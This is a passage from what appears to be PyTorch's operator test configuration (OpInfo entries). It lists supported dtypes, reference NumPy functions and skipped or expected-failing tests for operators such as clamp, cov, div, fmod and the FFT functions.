tensors OpInfo('clamp', aliases=('clip',), ref=_clamp_numpy, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_clamp, reference_inputs_func=partial(reference_inputs_elementwise_ternary, sample_inputs_func=sample_inputs_clamp), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # nvFuser and NNC appear to not handle boolean clamp DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), )), UnaryUfuncInfo('positive', ref=np.positive, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('conj', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_sparse=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('conj_physical', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # RuntimeError: inputSet && outputSet # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":118, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, )), DecorateInfo(unittest.skip("Skipped! conj_physical_ not implemented for sparse"), 'TestSparseUnaryUfuncs', 'test_inplace'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_inplace", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_out", dtypes=(torch.complex32,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.complex32,)), )), OpInfo('resolve_conj', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('resolve_neg', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('view_as_real', dtypes=complex_types(), supports_forward_ad=True, supports_out=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_real, test_conjugated_samples=False, ), OpInfo('view_as_complex', dtypes=floating_types_and(torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, test_neg_view=False, sample_inputs_func=sample_inputs_view_as_complex, skips=( # RuntimeError: Tensor must have a last dimension with stride 1 DecorateInfo(unittest.expectedFailure, "TestCommon", "test_noncontiguous_samples"), # RuntimeError: "eq_cpu" not implemented for 
'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.half,)), # RuntimeError: "eq_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.half,)), )), BinaryUfuncInfo('complex', dtypes=floating_types_and(torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # Test doesn't account for complex's type promotion semantics DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps'), )), BinaryUfuncInfo('copysign', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('corrcoef', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_corrcoef, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('cos', ref=np.cos, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), # This fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), UnaryUfuncInfo('cosh', ref=np_unary_ufunc_integer_promotion_wrapper(np.cosh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), OpInfo('cov', dtypes=all_types_and_complex_and(torch.bfloat16), 
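# torch.cov mirrors np.cov; its gradient checks are numerically fragile, hence
# the TestGradients expected failures and skips below.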
dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []),
backward_dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []),
sample_inputs_func=sample_inputs_cov,
error_inputs_func=error_inputs_cov,
supports_out=False,
supports_forward_ad=True, supports_fwgrad_bwgrad=True,
skips=(
    # Float did not match double
    DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'),
    # Jacobian mismatch
    DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'),
    DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'),
    DecorateInfo(unittest.skip("Barely fails"), 'TestGradients', 'test_fn_fwgrad_bwgrad'),
    # JIT test not working for tensor kwargs (https://github.com/pytorch/pytorch/issues/58507)
    # RuntimeError:
    # undefined value tensor:
    #   File "<string>", line 3
    # def the_method(i0):
    #     return torch.cov(i0, correction=0, fweights=None, aweights=tensor([0.0518, 0.4681], dtype=torch.float32, requires_grad=True))  # noqa: B950
    #                                                                 ~~~~~~ <--- HERE
    DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
    DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'),
)),
OpInfo('cross',
       dtypes=all_types_and_complex_and(torch.bfloat16),
       dtypesIfCUDA=all_types_and_complex_and(torch.half),
       sample_inputs_func=sample_inputs_cross,
       supports_fwgrad_bwgrad=True,
       supports_out=True,
       supports_forward_ad=True),
OpInfo('linalg.cross',
       ref=lambda x, y, dim=-1: np.cross(x, y, axis=dim),
       op=torch.linalg.cross,
       dtypes=all_types_and_complex_and(torch.bfloat16),
       dtypesIfCUDA=all_types_and_complex_and(torch.half),
       aten_name='linalg_cross',
       sample_inputs_func=sample_inputs_cross,
       supports_out=True,
       supports_fwgrad_bwgrad=True,
       supports_forward_ad=True),
OpInfo('cumsum',
       dtypes=all_types_and_complex_and(torch.bfloat16),
       dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16),
       supports_forward_ad=True, supports_fwgrad_bwgrad=True,
       skips=(
           # cumsum does not correctly handle out= dtypes
           DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
       ),
       sample_inputs_func=sample_inputs_cumulative_ops),
OpInfo('cumprod',
       dtypes=all_types_and_complex_and(torch.bfloat16),
       dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16),
       supports_forward_ad=True, supports_fwgrad_bwgrad=True,
       skips=(
           # cumprod does not correctly handle out= dtypes
           DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
           DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'),
       ),
       # gradgradcheck fails in fast_mode=True: #56275
       sample_inputs_func=sample_inputs_cumprod,
       gradcheck_fast_mode=False),
OpInfo('cummax',
       dtypes=all_types_and(torch.bool, torch.bfloat16),
       dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16),
       sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False),
       supports_forward_ad=True, supports_fwgrad_bwgrad=True,
       gradcheck_nondet_tol=GRADCHECK_NONDET_TOL),
OpInfo('cummin',
       dtypes=all_types_and(torch.bool, torch.bfloat16),
       dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16),
       sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False),
       supports_forward_ad=True, supports_fwgrad_bwgrad=True,
       gradcheck_nondet_tol=GRADCHECK_NONDET_TOL),
UnaryUfuncInfo('deg2rad',
               ref=np.radians,
               decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),),
               dtypes=all_types_and(torch.bool, torch.half,
torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), )), OpInfo('diff', op=torch.diff, # np.diff has np._NoValue as default values for prepend and append, compare_with_reference breaks if prepend/append # are set as None when converting to numpy ref=lambda input, n=1, dim=-1, prepend=np._NoValue, append=np._NoValue: ( np.diff(input, n, dim, np._NoValue if prepend is None else prepend, np._NoValue if append is None else append) ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diff), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='no_rounding_mode', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True),), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='trunc_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="trunc")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='floor_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="floor")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('true_divide', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, rhs_make_tensor_kwargs=dict(exclude_zero=True)), UnaryUfuncInfo('exp', ref=np_unary_ufunc_integer_promotion_wrapper(np.exp), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Reference: https://github.com/pytorch/pytorch/pull/50093#pullrequestreview-561791547 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), # Reference: 
https://github.com/pytorch/pytorch/issues/48010 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('expand', op=lambda self, shape: self.expand(shape), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_expand, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('expand_as', op=lambda self, other: self.expand_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_expand_as, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),), ), OpInfo('diag', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diag, error_inputs_func=error_inputs_diag), OpInfo('diag_embed', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal', # They are not strictly aliases as they have diverging defaults, but we can see them as aliases for testing purposes # If we add tests that test the function against the alias, make linalg.diagonal into its own OpInfo aliases=('linalg.diagonal',), aten_backward_name='diagonal_backward', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal_scatter', dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_scatter), BinaryUfuncInfo('eq', ref=np.equal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), always_returns_bool=True, supports_autograd=False, sample_inputs_func=sample_inputs_comparison_ops), BinaryUfuncInfo('fmax', op=torch.fmax, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmin', op=torch.fmin, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmod', ref=np.fmod, dtypes=all_types_and(torch.float16, torch.bfloat16), 
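# fmod follows C fmod / np.fmod semantics (the result takes the sign of the
# dividend), while 'remainder' below follows Python's % (sign of the divisor),
# e.g. torch.fmod(torch.tensor(-7.), 3.) == -1. but
#      torch.remainder(torch.tensor(-7.), 3.) == 2.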
dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), BinaryUfuncInfo('remainder', ref=np.remainder, dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, operator_variant=operator.mod, inplace_operator_variant=operator.imod, supports_one_python_scalar=True, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), # Fails on XLA # False is not true : Tensors failed to compare as equal! # Attempted to compare equality of tensors with different dtypes DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), )), UnaryUfuncInfo('frac', ref=lambda x: np.modf(x)[0], dtypes=floating_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.bfloat16, torch.float16, torch.float32, torch.float64)), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.float32, torch.float64)), )), SpectralFuncInfo('fft.fft', aten_name='fft_fft', ref=np.fft.fft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), SpectralFuncInfo('fft.fft2', aten_name='fft_fft2', ref=np.fft.fft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.fftn', aten_name='fft_fftn', ref=np.fft.fftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA 
supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.hfft', aten_name='fft_hfft', ref=np.fft.hfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False), SpectralFuncInfo('fft.hfft2', aten_name='fft_hfft2', ref=scipy.fft.hfft2 if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.hfftn', aten_name='fft_hfftn', ref=scipy.fft.hfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd'), ], ), SpectralFuncInfo('fft.rfft', aten_name='fft_rfft', ref=np.fft.rfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, skips=( ), check_batched_gradgrad=False), SpectralFuncInfo('fft.rfft2', aten_name='fft_rfft2', ref=np.fft.rfft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.rfftn', aten_name='fft_rfftn', ref=np.fft.rfftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else 
(torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.ifft', aten_name='fft_ifft', ref=np.fft.ifft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),), SpectralFuncInfo('fft.ifft2', aten_name='fft_ifft2', ref=np.fft.ifft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ifftn', aten_name='fft_ifftn', ref=np.fft.ifftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ihfft', aten_name='fft_ihfft', ref=np.fft.ihfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), skips=( ), check_batched_grad=False), SpectralFuncInfo('fft.ihfft2', aten_name='fft_ihfft2', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=( # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd'), # Mismatched elements! 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'))),
SpectralFuncInfo('fft.ihfftn',
                 aten_name='fft_ihfftn',
                 ref=scipy.fft.ihfftn if has_scipy_fft else None,
                 ndimensional=SpectralFuncType.ND,
                 supports_forward_ad=True, supports_fwgrad_bwgrad=True,
                 dtypes=all_types_and(torch.bool),
                 # rocFFT doesn't support Half/Complex Half Precision FFT
                 # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs
                 dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)),
                 check_batched_grad=False,
                 check_batched_gradgrad=False,
                 decorators=[
                     # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]).
                     DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'),
                     # Mismatched elements!
                     DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
